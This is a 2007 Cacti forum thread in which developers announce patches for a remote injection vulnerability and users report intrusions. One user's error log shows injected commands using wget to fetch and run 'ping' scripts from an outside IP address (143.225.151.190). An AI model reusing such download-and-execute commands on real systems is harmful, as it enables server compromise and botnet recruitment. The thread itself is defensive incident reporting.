[Cacti <= 0.8.6i] Remote Injection Exploit

rony · **Posted:** Wed Jan 03, 2007 4:58 pm

Patch will be released this week.

rony · **Posted:** Mon Jan 08, 2007 10:34 am

Patches for this issue are now available for the following versions:

0.8.6i
0.8.6h

roddie · **Posted:** Tue Jan 09, 2007 3:15 pm

Can someone update the main page and maybe post something to Announcements about the available patches?

Makenshi · **Joined:** Tue Jun 08, 2004 5:34 am **Posts:** 26

My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however I shall be reimaging the server tomorrow.

Makenshi · **Joined:** Tue Jun 08, 2004 5:34 am **Posts:** 26

Please see the log excerpt attached.

rony · **Posted:** Tue Jan 09, 2007 4:11 pm

That's not the standard exploit.

Um... I will decode later to see what they where attempting to do. Thanks for the log.

BigWillyStyle42 · **Joined:** Tue Mar 14, 2006 11:13 am **Posts:** 11

I think it's the same vulnerability, slightly different code but they're still injecting a command into the SQL database.

The command calls wget to get a ping script which it then calls and wget's some other things. A similar command was used on my machine, except they downloaded two images which were tar balls containing scripts and an httpd that connected my machine to an underworld botnet...

Makenshi · **Joined:** Tue Jun 08, 2004 5:34 am **Posts:** 26

These are a couple of files I managed to retrieve in /etc/cron.d/, the exploit managed to start sshd running on [::]:80 and [::]:443.

Ning · **Posted:** Wed Jan 10, 2007 7:21 am

I've seen the same, but from a other ip.
If I try to convert it - it turns out to something like this.
and the ping file it got from 143.225.151.190

At this moment I'm very glad for SELinux

rony · **Posted:** Wed Jan 10, 2007 9:34 am

Interesting...

Glad I have a local firewall configured..

TheWitness · **Posted:** Wed Jan 10, 2007 4:49 pm

Nasty, yet elegant exploit. It's rather scary.

TheWitness

dvl · **Posted:** Thu Jan 11, 2007 10:29 pm

PLEASE! Someone post this to the announce mailing list. It needs wider attention.

I've just submitted a patch for the FreeBSD port.

TheWitness · **Posted:** Thu Jan 11, 2007 11:41 pm

Done. Also, if you applied the patch and it broke your timespan selector. So long as you are not running the Timeshifter from Gandolf, you can apply the following file directly. I will correct the issue.

TheWitness

dvl · **Posted:** Fri Jan 12, 2007 9:19 am

See http://secunia.com/advisories/23528/

lozzd · **Joined:** Thu Dec 08, 2005 7:13 pm **Posts:** 30

I had the same as Ning.

However, I have the following in my error log:

Code:

--05:54:11--  http://143.225.151.190/libsh/ping.txt
           => `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11--  http://143.225.151.190/libsh/ping
           => `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory

Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now.. There should really be a way to tell everyone about that! Had I not have been checking through my error logs I wouldn't have known. [/code]

[Cacti <= 0.8.6i] Remote Injection Exploit

Who is online